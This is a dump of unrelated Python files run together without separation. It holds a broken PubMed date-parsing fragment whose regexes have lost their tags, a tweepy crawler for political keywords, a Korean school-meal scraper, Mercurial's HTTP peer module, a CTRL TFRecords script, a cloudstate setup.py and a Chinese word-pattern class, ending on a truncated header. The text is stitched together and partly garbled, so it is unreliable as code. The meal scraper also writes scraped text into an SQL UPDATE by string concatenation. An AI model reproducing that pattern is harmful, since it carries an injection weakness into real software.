line): matched = re.search("(.+)<\/Month>", line) month = matched.group(1) if month in months_list_keys: month_index = months_list[month] month = str(month_index) if re.search("(.+)<\/Day>", line): matched = re.search("(.+)<\/Day>", line) day = matched.group(1) if re.search("(.+)<\/MedlineDate>", line): matched = re.search("(.+)<\/MedlineDate>", line) medlinedate = matched.group(1) for month_name in months_list_keys: if month == "": if month_name in medlinedate: month_index = months_list[month_name] month = str(month_index) print("==" + month + "--") if re.search("[1-2][0-9][0-9][0-9]", medlinedate): matched = re.search("([1-2][0-9][0-9][0-9])", medlinedate) year = matched.group(1) # when the record ends write the output if re.search(" 12: if int(day) < 1 or int(day) > 31: if int(year) < 1000 or int(year) > 2030: f_out.write(pmid + "\t" + date + "\n") pmid = "0" abstract = "" title = "" year = "" month = "" day = "" 
Tools/crawl-tweets/CrawlTweetsByHashtag.py import tweepy from DataHelper import get_crawled_tweets_id_list, clear_crawled_tweets_id_list, put_crawled_tweets_id_list, init_saved_tweets_file, added_to_csv_files from DataHelper import add_log, set_api from DataHelper import search_tweets_by_phrase import time def crawl_political(oauth_api, if_clear=False): BASE_PATH = "../develop/political" SAVE_FILE_NAME, LOG_FILE_NAME = init_saved_tweets_file(BASE_PATH) if if_clear: clear_crawled_tweets_id_list(BASE_PATH) search_since_date = None key_phrase_list = ['Trump', 'Biden', 'Sanders', 'Harris', 'Warren'] for key_phrase in key_phrase_list: add_log(LOG_FILE_NAME, "Searching tweets with key_phrase: (%s)" % key_phrase) search_tweets_by_phrase(oauth_api, key_phrase, SAVE_FILE_NAME, BASE_PATH, search_since_date) return if __name__ == '__main__': oauth_api = set_api(proxyUrl="http://127.0.0.1:7078") crawl_political(oauth_api, if_clear=False) jyh69293/index1 import urllib.request import sqlite3 from bs4 import BeautifulSoup # 타학교에서 이용시 수정 regioncode = 'cbe.go.kr' schulcode = 'M100002171' # Tuple day = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat'] meal = ['', '', '', '', '', '', '일요일은 급식이 제공되지 않습니다.'] ######### # Crawl # ######### sccode = 1 while sccode < 4: # NEIS에서 급식 파싱 url = ('http://stu.' + regioncode + '/sts_sci_md01_001.do?schulCode=' + schulcode + '&schulCrseScCode=4&schulKndScCode=04&schMmealScCode=' + str(sccode)) try: source = urllib.request.urlopen(url, timeout=3) except Exception as e: print(e) menu = ('급식 정보를 가져오는 중 문제가 발생하였습니다.\n관리자에게 연락바랍니다.') else: # beautifulsoup4를 이용해 utf-8, lxml으로 파싱 soup = BeautifulSoup(source, "lxml", from_encoding='utf-8') # div_id="contents"안의 table을 모두 검색 후 td태그만 추출 table_div = soup.find(id="contents") tables = table_div.find_all("table") menu_table = tables[0] td = menu_table.find_all('td') today = 0 while today < 6: # 월요일 ~ 토요일 = td[8] ~ td[13] menu = td[today + 8] # 파싱 후 불필요한 태그 잔해물 제거 menu = str(menu).replace('*', '').replace('', "").replace('', '').replace('class="textC last">', '').replace('class="textC">','').replace('
    ', '\n').replace('1.', '').replace('2.', '').replace('3.', '').replace('4.', '').replace('5.', '').replace('6.','').replace('7.', '').replace('8.', '').replace('9.', '').replace('10.', '').replace('11.', '').replace('12.', '').replace('13.', '').replace('14.', '').replace('15.', '').replace('1', '').replace(' ', '') if menu == '': menu = '급식 정보가 존재하지 않습니다.\n급식이 없는 날일 수 있으니 확인 바랍니다.' if today != 6: if sccode == 1: meal[today] = "[조식]\n" + menu elif sccode == 2: meal[today] = meal[today] + "\n\n[중식]\n" + menu elif sccode == 3: meal[today] = meal[today] + "\n\n[석식]\n" + menu today = today + 1 sccode = sccode + 1 ####### # SQL # ####### con = sqlite3.connect("meal.db") cur = con.cursor() check = ("SELECT * FROM meal") cur.execute(check) data = cur.fetchone() if data is None: insert = ("INSERT into meal('mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun') VALUES (?, ?, ?, ?, ?, ?, ?)") cur.execute(insert, meal) else: for i in day: update = ("UPDATE meal SET " + i + " = '" + meal[(day.index(i))] + "' WHERE no = 1") cur.execute(update) con.commit() con.close() # httppeer.py - HTTP repository proxy classes for mercurial # # Copyright 2005, 2006 <> # Copyright 2006 <> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. from __future__ import absolute_import import errno import io import os import socket import struct import weakref from .i18n import _ from . import ( bundle2, error, httpconnection, pycompat, repository, statichttprepo, url as urlmod, util, wireprotoframing, wireprototypes, wireprotov1peer, wireprotov2peer, wireprotov2server, ) from .utils import ( cborutil, interfaceutil, stringutil, ) httplib = util.httplib urlerr = util.urlerr urlreq = util.urlreq def encodevalueinheaders(value, header, limit): """Encode a string value into multiple HTTP headers. ``value`` will be encoded into 1 or more HTTP headers with the names ``header-`` where ```` is an integer starting at 1. Each header name + value will be at most ``limit`` bytes long. Returns an iterable of 2-tuples consisting of header names and values as native strings. """ # HTTP Headers are ASCII. Python 3 requires them to be unicodes, # not bytes. This function always takes bytes in as arguments. fmt = pycompat.strurl(header) + r'-%s' # Note: it is *NOT* a bug that the last bit here is a bytestring # and not a unicode: we're just getting the encoded length anyway, # and using an r-string to make it portable between Python 2 and 3 # doesn't work because then the \r is a literal backslash-r # instead of a carriage return. 
valuelen = limit - len(fmt % r'000') - len(': \r\n') result = [] n = 0 for i in pycompat.xrange(0, len(value), valuelen): n += 1 result.append((fmt % str(n), pycompat.strurl(value[i:i + valuelen]))) return result class _multifile(object): def __init__(self, *fileobjs): for f in fileobjs: if not util.safehasattr(f, 'length'): raise ValueError( '_multifile only supports file objects that ' 'have a length but this one does not:', type(f), f) self._fileobjs = fileobjs self._index = 0 @property def length(self): return sum(f.length for f in self._fileobjs) def read(self, amt=None): if amt <= 0: return ''.join(f.read() for f in self._fileobjs) parts = [] while amt and self._index < len(self._fileobjs): parts.append(self._fileobjs[self._index].read(amt)) got = len(parts[-1]) if got < amt: self._index += 1 amt -= got return ''.join(parts) def seek(self, offset, whence=os.SEEK_SET): if whence != os.SEEK_SET: raise NotImplementedError( '_multifile does not support anything other' ' than os.SEEK_SET for whence on seek()') if offset != 0: raise NotImplementedError( '_multifile only supports seeking to start, but that ' 'could be fixed if you need it') for f in self._fileobjs: f.seek(0) self._index = 0 def makev1commandrequest(ui, requestbuilder, caps, capablefn, repobaseurl, cmd, args): """Make an HTTP request to run a command for a version 1 client. ``caps`` is a set of known server capabilities. The value may be None if capabilities are not yet known. ``capablefn`` is a function to evaluate a capability. ``cmd``, ``args``, and ``data`` define the command, its arguments, and raw data to pass to it. """ if cmd == 'pushkey': args['data'] = '' data = args.pop('data', None) headers = args.pop('headers', {}) ui.debug("sending %s command\n" % cmd) q = [('cmd', cmd)] headersize = 0 # Important: don't use self.capable() here or else you end up # with infinite recursion when trying to look up capabilities # for the first time. postargsok = caps is not None and 'httppostargs' in caps # Send arguments via POST. if postargsok and args: strargs = urlreq.urlencode(sorted(args.items())) if not data: data = strargs else: if isinstance(data, bytes): i = io.BytesIO(data) i.length = len(data) data = i argsio = io.BytesIO(strargs) argsio.length = len(strargs) data = _multifile(argsio, data) headers[r'X-HgArgs-Post'] = len(strargs) elif args: # Calling self.capable() can infinite loop if we are calling # "capabilities". But that command should never accept wire # protocol arguments. So this should never happen. assert cmd != 'capabilities' httpheader = capablefn('httpheader') if httpheader: headersize = int(httpheader.split(',', 1)[0]) # Send arguments via HTTP headers. if headersize > 0: # The headers can typically carry more data than the URL. encargs = urlreq.urlencode(sorted(args.items())) for header, value in encodevalueinheaders(encargs, 'X-HgArg', headersize): headers[header] = value # Send arguments via query string (Mercurial <1.9). else: q += sorted(args.items()) qs = '?%s' % urlreq.urlencode(q) cu = "%s%s" % (repobaseurl, qs) size = 0 if util.safehasattr(data, 'length'): size = data.length elif data is not None: size = len(data) if data is not None and r'Content-Type' not in headers: headers[r'Content-Type'] = r'application/mercurial-0.1' # Tell the server we accept application/mercurial-0.2 and multiple # compression formats if the server is capable of emitting those # payloads. # Note: Keep this set empty by default, as client advertisement of # protocol parameters should only occur after the handshake. 
protoparams = set() mediatypes = set() if caps is not None: mt = capablefn('httpmediatype') if mt: protoparams.add('0.1') mediatypes = set(mt.split(',')) protoparams.add('partial-pull') if '0.2tx' in mediatypes: protoparams.add('0.2') if '0.2tx' in mediatypes and capablefn('compression'): # We /could/ compare supported compression formats and prune # non-mutually supported or error if nothing is mutually supported. # For now, send the full list to the server and have it error. comps = [e.wireprotosupport().name for e in util.compengines.supportedwireengines(util.CLIENTROLE)] protoparams.add('comp=%s' % ','.join(comps)) if protoparams: protoheaders = encodevalueinheaders(' '.join(sorted(protoparams)), 'X-HgProto', headersize or 1024) for header, value in protoheaders: headers[header] = value varyheaders = [] for header in headers: if header.lower().startswith(r'x-hg'): varyheaders.append(header) if varyheaders: headers[r'Vary'] = r','.join(sorted(varyheaders)) req = requestbuilder(pycompat.strurl(cu), data, headers) if data is not None: ui.debug("sending %d bytes\n" % size) req.add_unredirected_header(r'Content-Length', r'%d' % size) return req, cu, qs def _reqdata(req): """Get request data, if any. If no data, returns None.""" if pycompat.ispy3: return req.data if not req.has_data(): return None return req.get_data() def sendrequest(ui, opener, req): """Send a prepared HTTP request. Returns the response object. """ dbg = ui.debug if (ui.debugflag and ui.configbool('devel', 'debug.peer-request')): line = 'devel-peer-request: %s\n' dbg(line % '%s %s' % (pycompat.bytesurl(req.get_method()), pycompat.bytesurl(req.get_full_url()))) hgargssize = None for header, value in sorted(req.header_items()): header = pycompat.bytesurl(header) value = pycompat.bytesurl(value) if header.startswith('X-hgarg-'): if hgargssize is None: hgargssize = 0 hgargssize += len(value) else: dbg(line % ' %s %s' % (header, value)) if hgargssize is not None: dbg(line % ' %d bytes of commands arguments in headers' % hgargssize) data = _reqdata(req) if data is not None: length = getattr(data, 'length', None) if length is None: length = len(data) dbg(line % ' %d bytes of data' % length) start = util.timer() res = None try: res = opener.open(req) except urlerr.httperror as inst: if inst.code == 401: raise error.Abort(_('authorization failed')) raise except httplib.HTTPException as inst: ui.debug('http error requesting %s\n' % util.hidepassword(req.get_full_url())) ui.traceback() raise IOError(None, inst) finally: if ui.debugflag and ui.configbool('devel', 'debug.peer-request'): code = res.code if res else -1 dbg(line % ' finished in %.4f seconds (%d)' % (util.timer() - start, code)) # Insert error handlers for common I/O failures. 
urlmod.wrapresponse(res) return res class RedirectedRepoError(error.RepoError): def __init__(self, msg, respurl): super(RedirectedRepoError, self).__init__(msg) self.respurl = respurl def parsev1commandresponse(ui, baseurl, requrl, qs, resp, compressible, allowcbor=False): # record the url we got redirected to redirected = False respurl = pycompat.bytesurl(resp.geturl()) if respurl.endswith(qs): respurl = respurl[:-len(qs)] qsdropped = False else: qsdropped = True if baseurl.rstrip('/') != respurl.rstrip('/'): redirected = True if not ui.quiet: ui.warn(_('real URL is %s\n') % respurl) try: proto = pycompat.bytesurl(resp.getheader(r'content-type', r'')) except AttributeError: proto = pycompat.bytesurl(resp.headers.get(r'content-type', r'')) safeurl = util.hidepassword(baseurl) if proto.startswith('application/hg-error'): raise error.OutOfBandError(resp.read()) # Pre 1.0 versions of Mercurial used text/plain and # application/hg-changegroup. We don't support such old servers. if not proto.startswith('application/mercurial-'): ui.debug("requested URL: '%s'\n" % util.hidepassword(requrl)) msg = _("'%s' does not appear to be an hg repository:\n" "---%%<--- (%s)\n%s\n---%%<---\n") % ( safeurl, proto or 'no content-type', resp.read(1024)) # Some servers may strip the query string from the redirect. We # raise a special error type so callers can react to this specially. if redirected and qsdropped: raise RedirectedRepoError(msg, respurl) else: raise error.RepoError(msg) try: subtype = proto.split('-', 1)[1] # Unless we end up supporting CBOR in the legacy wire protocol, # this should ONLY be encountered for the initial capabilities # request during handshake. if subtype == 'cbor': if allowcbor: return respurl, proto, resp else: raise error.RepoError(_('unexpected CBOR response from ' 'server')) version_info = tuple([int(n) for n in subtype.split('.')]) except ValueError: raise error.RepoError(_("'%s' sent a broken Content-Type " "header (%s)") % (safeurl, proto)) # TODO consider switching to a decompression reader that uses # generators. if version_info == (0, 1): if compressible: resp = util.compengines['zlib'].decompressorreader(resp) elif version_info == (0, 2): # application/mercurial-0.2 always identifies the compression # engine in the payload header. elen = struct.unpack('B', util.readexactly(resp, 1))[0] ename = util.readexactly(resp, elen) engine = util.compengines.forwiretype(ename) resp = engine.decompressorreader(resp) else: raise error.RepoError(_("'%s' uses newer protocol %s") % (safeurl, subtype)) return respurl, proto, resp class httppeer(wireprotov1peer.wirepeer): def __init__(self, ui, path, url, opener, requestbuilder, caps): self.ui = ui self._path = path self._url = url self._caps = caps self._urlopener = opener self._requestbuilder = requestbuilder def __del__(self): for h in self._urlopener.handlers: h.close() getattr(h, "close_all", lambda: None)() # Begin of ipeerconnection interface. def url(self): return self._path def local(self): return None def peer(self): return self def canpush(self): return True def close(self): try: reqs, sent, recv = (self._urlopener.requestscount, self._urlopener.sentbytescount, self._urlopener.receivedbytescount) except AttributeError: return self.ui.note(_('(sent %d HTTP requests and %d bytes; ' 'received %d bytes in responses)\n') % (reqs, sent, recv)) # End of ipeerconnection interface. # Begin of ipeercommands interface. def capabilities(self): return self._caps # End of ipeercommands interface. 
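    # How a version 1 command is issued (see the helpers above): _callstream()
    # below builds the request with makev1commandrequest(), sends it with
    # sendrequest(), and decodes the reply with parsev1commandresponse().
    # Illustrative sizes (hypothetical, not taken from this module): if the
    # server advertises 'httpheader' with a 1024-byte limit and the URL-encoded
    # arguments come to roughly 2.5 kB, encodevalueinheaders() spreads them over
    # X-HgArg-1, X-HgArg-2 and X-HgArg-3, each header line staying under the
    # limit, and every X-Hg* header that was sent is echoed back in Vary.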
def _callstream(self, cmd, _compressible=False, **args): args = pycompat.byteskwargs(args) req, cu, qs = makev1commandrequest(self.ui, self._requestbuilder, self._caps, self.capable, self._url, cmd, args) resp = sendrequest(self.ui, self._urlopener, req) self._url, ct, resp = parsev1commandresponse(self.ui, self._url, cu, qs, resp, _compressible) return resp def _call(self, cmd, **args): fp = self._callstream(cmd, **args) try: return fp.read() finally: # if using keepalive, allow connection to be reused fp.close() def _callpush(self, cmd, cg, **args): # have to stream bundle to a temp file because we do not have # http 1.1 chunked transfer. types = self.capable('unbundle') try: types = types.split(',') except AttributeError: # servers older than d1b16a746db6 will send 'unbundle' as a # boolean capability. They only support headerless/uncompressed # bundles. types = [""] for x in types: if x in bundle2.bundletypes: type = x break tempname = bundle2.writebundle(self.ui, cg, None, type) fp = httpconnection.httpsendfile(self.ui, tempname, "rb") headers = {r'Content-Type': r'application/mercurial-0.1'} try: r = self._call(cmd, data=fp, headers=headers, **args) vals = r.split('\n', 1) if len(vals) < 2: raise error.ResponseError(_("unexpected response:"), r) return vals except urlerr.httperror: # Catch and re-raise these so we don't try and treat them # like generic socket errors. They lack any values in # .args on Python 3 which breaks our socket.error block. raise except socket.error as err: if err.args[0] in (errno.ECONNRESET, errno.EPIPE): raise error.Abort(_('push failed: %s') % err.args[1]) raise error.Abort(err.args[1]) finally: fp.close() os.unlink(tempname) def _calltwowaystream(self, cmd, fp, **args): fh = None fp_ = None filename = None try: # dump bundle to disk fd, filename = pycompat.mkstemp(prefix="hg-bundle-", suffix=".hg") fh = os.fdopen(fd, r"wb") d = fp.read(4096) while d: fh.write(d) d = fp.read(4096) fh.close() # start http push fp_ = httpconnection.httpsendfile(self.ui, filename, "rb") headers = {r'Content-Type': r'application/mercurial-0.1'} return self._callstream(cmd, data=fp_, headers=headers, **args) finally: if fp_ is not None: fp_.close() if fh is not None: fh.close() os.unlink(filename) def _callcompressable(self, cmd, **args): return self._callstream(cmd, _compressible=True, **args) def _abort(self, exception): raise exception def sendv2request(ui, opener, requestbuilder, apiurl, permission, requests, redirect): wireprotoframing.populatestreamencoders() uiencoders = ui.configlist(b'experimental', b'httppeer.v2-encoder-order') if uiencoders: encoders = [] for encoder in uiencoders: if encoder not in wireprotoframing.STREAM_ENCODERS: ui.warn(_(b'wire protocol version 2 encoder referenced in ' b'config (%s) is not known; ignoring\n') % encoder) else: encoders.append(encoder) else: encoders = wireprotoframing.STREAM_ENCODERS_ORDER reactor = wireprotoframing.clientreactor(ui, hasmultiplesend=False, buffersends=True, clientcontentencoders=encoders) handler = wireprotov2peer.clienthandler(ui, reactor, opener=opener, requestbuilder=requestbuilder) url = '%s/%s' % (apiurl, permission) if len(requests) > 1: url += '/multirequest' else: url += '/%s' % requests[0][0] ui.debug('sending %d commands\n' % len(requests)) for command, args, f in requests: ui.debug('sending command %s: %s\n' % ( command, stringutil.pprint(args, indent=2))) assert not list(handler.callcommand(command, args, f, redirect=redirect)) # TODO stream this. 
body = b''.join(map(bytes, handler.flushcommands())) # TODO modify user-agent to reflect v2 headers = { r'Accept': wireprotov2server.FRAMINGTYPE, r'Content-Type': wireprotov2server.FRAMINGTYPE, } req = requestbuilder(pycompat.strurl(url), body, headers) req.add_unredirected_header(r'Content-Length', r'%d' % len(body)) try: res = opener.open(req) except urlerr.httperror as e: if e.code == 401: raise error.Abort(_('authorization failed')) raise except httplib.HTTPException as e: ui.traceback() raise IOError(None, e) return handler, res class queuedcommandfuture(pycompat.futures.Future): """Wraps result() on command futures to trigger submission on call.""" def result(self, timeout=None): if self.done(): return pycompat.futures.Future.result(self, timeout) self._peerexecutor.sendcommands() # sendcommands() will restore the original __class__ and self.result # will resolve to Future.result. return self.result(timeout) @interfaceutil.implementer(repository.ipeercommandexecutor) class httpv2executor(object): def __init__(self, ui, opener, requestbuilder, apiurl, descriptor, redirect): self._ui = ui self._opener = opener self._requestbuilder = requestbuilder self._apiurl = apiurl self._descriptor = descriptor self._redirect = redirect self._sent = False self._closed = False self._neededpermissions = set() self._calls = [] self._futures = weakref.WeakSet() self._responseexecutor = None self._responsef = None def __enter__(self): return self def __exit__(self, exctype, excvalue, exctb): self.close() def callcommand(self, command, args): if self._sent: raise error.ProgrammingError('callcommand() cannot be used after ' 'commands are sent') if self._closed: raise error.ProgrammingError('callcommand() cannot be used after ' 'close()') # The service advertises which commands are available. So if we attempt # to call an unknown command or pass an unknown argument, we can screen # for this. if command not in self._descriptor['commands']: raise error.ProgrammingError( 'wire protocol command %s is not available' % command) cmdinfo = self._descriptor['commands'][command] unknownargs = set(args.keys()) - set(cmdinfo.get('args', {})) if unknownargs: raise error.ProgrammingError( 'wire protocol command %s does not accept argument: %s' % ( command, ', '.join(sorted(unknownargs)))) self._neededpermissions |= set(cmdinfo['permissions']) # TODO we /could/ also validate types here, since the API descriptor # includes types... f = pycompat.futures.Future() # Monkeypatch it so result() triggers sendcommands(), otherwise result() # could deadlock. f.__class__ = queuedcommandfuture f._peerexecutor = self self._futures.add(f) self._calls.append((command, args, f)) return f def sendcommands(self): if self._sent: return if not self._calls: return self._sent = True # Unhack any future types so caller sees a clean type and so we # break reference cycle. for f in self._futures: if isinstance(f, queuedcommandfuture): f.__class__ = pycompat.futures.Future f._peerexecutor = None # Mark the future as running and filter out cancelled futures. calls = [(command, args, f) for command, args, f in self._calls if f.set_running_or_notify_cancel()] # Clear out references, prevent improper object usage. 
self._calls = None if not calls: return permissions = set(self._neededpermissions) if 'push' in permissions and 'pull' in permissions: permissions.remove('pull') if len(permissions) > 1: raise error.RepoError(_('cannot make request requiring multiple ' 'permissions: %s') % _(', ').join(sorted(permissions))) permission = { 'push': 'rw', 'pull': 'ro', }[permissions.pop()] handler, resp = sendv2request( self._ui, self._opener, self._requestbuilder, self._apiurl, permission, calls, self._redirect) # TODO we probably want to validate the HTTP code, media type, etc. self._responseexecutor = pycompat.futures.ThreadPoolExecutor(1) self._responsef = self._responseexecutor.submit(self._handleresponse, handler, resp) def close(self): if self._closed: return self.sendcommands() self._closed = True if not self._responsef: return # TODO ^C here may not result in immediate program termination. try: self._responsef.result() finally: self._responseexecutor.shutdown(wait=True) self._responsef = None self._responseexecutor = None # If any of our futures are still in progress, mark them as # errored, otherwise a result() could wait indefinitely. for f in self._futures: if not f.done(): f.set_exception(error.ResponseError( _('unfulfilled command response'))) self._futures = None def _handleresponse(self, handler, resp): # Called in a thread to read the response. while handler.readdata(resp): pass @interfaceutil.implementer(repository.ipeerv2) class httpv2peer(object): def __init__(self, ui, repourl, apipath, opener, requestbuilder, apidescriptor): self.ui = ui self.apidescriptor = apidescriptor if repourl.endswith('/'): repourl = repourl[:-1] self._url = repourl self._apipath = apipath self._apiurl = '%s/%s' % (repourl, apipath) self._opener = opener self._requestbuilder = requestbuilder self._redirect = wireprotov2peer.supportedredirects(ui, apidescriptor) # Start of ipeerconnection. def url(self): return self._url def local(self): return None def peer(self): return self def canpush(self): # TODO change once implemented. return False def close(self): self.ui.note(_('(sent %d HTTP requests and %d bytes; ' 'received %d bytes in responses)\n') % (self._opener.requestscount, self._opener.sentbytescount, self._opener.receivedbytescount)) # End of ipeerconnection. # Start of ipeercapabilities. def capable(self, name): # The capabilities used internally historically map to capabilities # advertised from the "capabilities" wire protocol command. However, # version 2 of that command works differently. # Maps to commands that are available. if name in ('branchmap', 'getbundle', 'known', 'lookup', 'pushkey'): return True # Other concepts. if name in ('bundle2'): return True # Alias command-* to presence of command of that name. if name.startswith('command-'): return name[len('command-'):] in self.apidescriptor['commands'] return False def requirecap(self, name, purpose): if self.capable(name): return raise error.CapabilityError( _('cannot %s; client or remote repository does not support the %r ' 'capability') % (purpose, name)) # End of ipeercapabilities. def _call(self, name, **args): with self.commandexecutor() as e: return e.callcommand(name, args).result() def commandexecutor(self): return httpv2executor(self.ui, self._opener, self._requestbuilder, self._apiurl, self.apidescriptor, self._redirect) # Registry of API service names to metadata about peers that handle it. 
# # The following keys are meaningful: # # init # Callable receiving (ui, repourl, servicepath, opener, requestbuilder, # apidescriptor) to create a peer. # # priority # Integer priority for the service. If we could choose from multiple # services, we choose the one with the highest priority. API_PEERS = { wireprototypes.HTTP_WIREPROTO_V2: { 'init': httpv2peer, 'priority': 50, }, } def performhandshake(ui, url, opener, requestbuilder): # The handshake is a request to the capabilities command. caps = None def capable(x): raise error.ProgrammingError('should not be called') args = {} # The client advertises support for newer protocols by adding an # X-HgUpgrade-* header with a list of supported APIs and an # X-HgProto-* header advertising which serializing formats it supports. # We only support the HTTP version 2 transport and CBOR responses for # now. advertisev2 = ui.configbool('experimental', 'httppeer.advertise-v2') if advertisev2: args['headers'] = { r'X-HgProto-1': r'cbor', } args['headers'].update( encodevalueinheaders(' '.join(sorted(API_PEERS)), 'X-HgUpgrade', # We don't know the header limit this early. # So make it small. 1024)) req, requrl, qs = makev1commandrequest(ui, requestbuilder, caps, capable, url, 'capabilities', args) resp = sendrequest(ui, opener, req) # The server may redirect us to the repo root, stripping the # ?cmd=capabilities query string from the URL. The server would likely # return HTML in this case and ``parsev1commandresponse()`` would raise. # We catch this special case and re-issue the capabilities request against # the new URL. # # We should ideally not do this, as a redirect that drops the query # string from the URL is arguably a server bug. (Garbage in, garbage out). # However, Mercurial clients for several years appeared to handle this # issue without behavior degradation. And according to issue 5860, it may # be a longstanding bug in some server implementations. So we allow a # redirect that drops the query string to "just work." try: respurl, ct, resp = parsev1commandresponse(ui, url, requrl, qs, resp, compressible=False, allowcbor=advertisev2) except RedirectedRepoError as e: req, requrl, qs = makev1commandrequest(ui, requestbuilder, caps, capable, e.respurl, 'capabilities', args) resp = sendrequest(ui, opener, req) respurl, ct, resp = parsev1commandresponse(ui, url, requrl, qs, resp, compressible=False, allowcbor=advertisev2) try: rawdata = resp.read() finally: resp.close() if not ct.startswith('application/mercurial-'): raise error.ProgrammingError('unexpected content-type: %s' % ct) if advertisev2: if ct == 'application/mercurial-cbor': try: info = cborutil.decodeall(rawdata)[0] except cborutil.CBORDecodeError: raise error.Abort(_('error decoding CBOR from remote server'), hint=_('try again and consider contacting ' 'the server operator')) # We got a legacy response. That's fine. elif ct in ('application/mercurial-0.1', 'application/mercurial-0.2'): info = { 'v1capabilities': set(rawdata.split()) } else: raise error.RepoError( _('unexpected response type from server: %s') % ct) else: info = { 'v1capabilities': set(rawdata.split()) } return respurl, info def makepeer(ui, path, opener=None, requestbuilder=urlreq.request): """Construct an appropriate HTTP peer instance. ``opener`` is an ``url.opener`` that should be used to establish connections, perform HTTP requests. ``requestbuilder`` is the type used for constructing HTTP requests. It exists as an argument so extensions can override the default. 
""" u = util.url(path) if u.query or u.fragment: raise error.Abort(_('unsupported URL component: "%s"') % (u.query or u.fragment)) # urllib cannot handle URLs with embedded user or passwd. url, authinfo = u.authinfo() ui.debug('using %s\n' % url) opener = opener or urlmod.opener(ui, authinfo) respurl, info = performhandshake(ui, url, opener, requestbuilder) # Given the intersection of APIs that both we and the server support, # sort by their advertised priority and pick the first one. # # TODO consider making this request-based and interface driven. For # example, the caller could say "I want a peer that does X." It's quite # possible that not all peers would do that. Since we know the service # capabilities, we could filter out services not meeting the # requirements. Possibly by consulting the interfaces defined by the # peer type. apipeerchoices = set(info.get('apis', {}).keys()) & set(API_PEERS.keys()) preferredchoices = sorted(apipeerchoices, key=lambda x: API_PEERS[x]['priority'], reverse=True) for service in preferredchoices: apipath = '%s/%s' % (info['apibase'].rstrip('/'), service) return API_PEERS[service]['init'](ui, respurl, apipath, opener, requestbuilder, info['apis'][service]) # Failed to construct an API peer. Fall back to legacy. return httppeer(ui, path, respurl, opener, requestbuilder, info['v1capabilities']) def instance(ui, path, create, intents=None, createopts=None): if create: raise error.Abort(_('cannot create new http repository')) try: if path.startswith('https:') and not urlmod.has_https: raise error.Abort(_('Python support for SSL and HTTPS ' 'is not installed')) inst = makepeer(ui, path) return inst except error.RepoError as httpexception: try: r = statichttprepo.instance(ui, "static-" + path, create) ui.note(_('(falling back to static-http)\n')) return r except error.RepoError: raise httpexception # use the original http RepoError instead import numpy as np import os import tensorflow as tf import tqdm import pdb import glob import time import sys import re import argparse import fastBPE import platform use_py3 = platform.python_version()[0] == '3' parser = argparse.ArgumentParser(description='TensorFlow code for creating TFRecords data') # required=True parser.add_argument('--text_file', type=str, default='moby_dick.txt', help='location of text file to convert to TFRecords') parser.add_argument('--control_code', type=str, default='Moby', help='control code to use for this file. 
must be in the vocabulary, else it will error out.') parser.add_argument('--sequence_len', type=int, default=256, help='sequence length of model being fine-tuned (256 or 512)') args = parser.parse_args() path_to_train_file = fname = args.text_file domain = [args.control_code] train_text = open(path_to_train_file, 'rb').read().decode(encoding='utf-8') bpe = fastBPE.fastBPE('../codes', '../vocab') tokenized_train_text = bpe.apply([train_text.encode('ascii', errors='ignore') if not use_py3 else train_text])[0] # will NOT work for non-English texts # if you want to run non-english text, please tokenize separately using ./fast applybpe and then run this script on the .bpe file with utf8 encoding tokenized_train_text = re.findall(r'\S+|\n', tokenized_train_text) tokenized_train_text = list(filter(lambda x: x != u'@@', tokenized_train_text)) # load the vocabulary from file vocab = open('../vocab').read().decode(encoding='utf-8').split('\n') if not use_py3 else open('../vocab', encoding='utf-8').read().split('\n') vocab = list(map(lambda x: x.split(' ')[0], vocab)) + [''] + ['\n'] print('{} unique words'.format(len(vocab))) if args.control_code not in vocab: print('Provided control code is not in the vocabulary') print('Please provide a different one; refer to the vocab file for allowable tokens') sys.exit(1) # Creating a mapping from unique characters to indices word2idx = {u: i for i, u in enumerate(vocab)} idx2word = np.array(vocab) seq_length = args.sequence_len-1 def numericalize(x): count = 0 for i in x: if i not in word2idx: print(i) count += 1 return count > 1, [word2idx.get(i, word2idx['']) for i in x] tfrecords_fname = fname.lower()+'.tfrecords' total = 0 skipped = 0 with tf.io.TFRecordWriter(tfrecords_fname) as writer: for i in tqdm.tqdm(range(0, len(tokenized_train_text), seq_length)): flag_input, inputs = numericalize(domain+tokenized_train_text[i:i+seq_length]) flag_output, outputs = numericalize(tokenized_train_text[i:i+seq_length+1]) total += 1 if flag_input or flag_output: skipped += 1 continue if len(inputs) != seq_length+1 or len(outputs) != seq_length+1: break example_proto = tf.train.Example(features=tf.train.Features(feature={'input': tf.train.Feature(int64_list=tf.train.Int64List(value=inputs)), 'output': tf.train.Feature(int64_list=tf.train.Int64List(value=outputs))})) writer.write(example_proto.SerializeToString()) print('Done') print('Skipped', skipped, 'of', total) setup.py1-10 """ Copyright 2020 Lightbend Inc. Licensed under the Apache License, Version 2.0. """ from setuptools import setup, find_packages # Load version in cloudstate package. 
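# The exec below pulls __version__ out of cloudstate/version.py so the version
# string only has to be maintained in one place; that file is assumed to hold a
# single assignment such as __version__ = '0.1.0' (illustrative value).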
exec(open('cloudstate/version.py').read()) version = __version__ name = 'cloudstate' print(f'package name: {name}, version: {version}', flush=True) setup(name=name, version=version, url='https://github.com/cloudstateio/python-support', license='Apache 2.0', description='Cloudstate Python Support Library', packages=find_packages(exclude=['tests', 'shoppingcart']), long_description=open('Description.md', 'r').read(), long_description_content_type='text/markdown', zip_safe=False) class PartCtr(object): def __init__(self) -> None: self._modes = [ {'mode': ['n', 'nd', 'u', 'a', 'n'], 'res':[(0, 1, '有', 3, 4), (3, 4, '在', 0, 1)]}, {'mode': ['n', 'nd', 'u', 'n'], 'res':[(0, 1, '有', 3), (3, '在', 0, 1)]}, {'mode': ['a', 'n', 'k', 'p', 'n', 'nd'], 'res':[(4, 5, '有', 0, 1, 2)]}, ] self._dataBase = [] def segment(self, asub, alist, wordlist): asubStr = '&'.join(asub) alistStr = '&'.join(alist) count = alistStr.count(asubStr) indices = [] res = [] startIndex = 0 for i in range(count): index = alistStr.find(asubStr, startIndex) listIndex = len(alistStr[:index].split('&')) - 1 indices.append(listIndex) startIndex += len(asubStr) for ii in indices: res.append(wordlist[ii: ii + len(asub)]) res = res if len(res) > 0 else None return res def useModeRes(self, modeRes, r): res = [] for rr in r: for mm in modeRes: sub = '' for m in mm: sub += rr[m] if type(m) == int else m res.append(sub) return res def validateMode(self, alist, wordlist): res = [] for m in self._modes: mode = m['mode'] r = self.segment(mode, alist, wordlist) if r: res += self.useModeRes(m['res'], r) return res partCtr = PartCtr()1-10 #!/usr/bin/python3 """ Last 